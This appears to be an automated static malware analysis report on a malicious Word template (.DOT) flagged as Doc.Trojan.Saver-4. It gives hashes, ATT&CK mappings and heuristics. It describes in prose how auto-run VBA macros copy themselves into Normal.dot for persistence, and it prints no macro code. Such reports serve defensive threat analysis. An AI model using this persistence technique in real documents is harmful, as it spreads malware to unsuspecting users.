Malicious Office (OLE) / .DOT — malware analysis report

Static analysis result for SHA-256 097f2266f41c941f…

MALICIOUS

Office (OLE) / .DOT

44.0 KB Created: 2007-08-28 08:21:00 Authoring application: Microsoft Office Word
MD5: 01f12b7bd2aaac4e5d0dc61c99f66dfd SHA-1: d7e7605dffd9d487b6b432d456a931c384f7c62f SHA-256: 097f2266f41c941f4b13cb18180c6064c4e1265d2d0d5f76f3e8a336ac9f0e9e
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word template (.DOT) containing VBA macros. The 'Saver' macro is designed to copy itself into the Normal.dot template and potentially to the Word application directory as 'saver.dll', indicating an attempt at persistence. The AutoOpen and Auto_Close macros suggest immediate execution upon opening and closing the document. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Saver-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Saver-4
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
cae510adc9cf684a035d8119422e0cacf304ddef322b3d94f4413dd5078dcfe2		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2590 bytes
Detection
ClamAV: Doc.Trojan.Saver-4
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.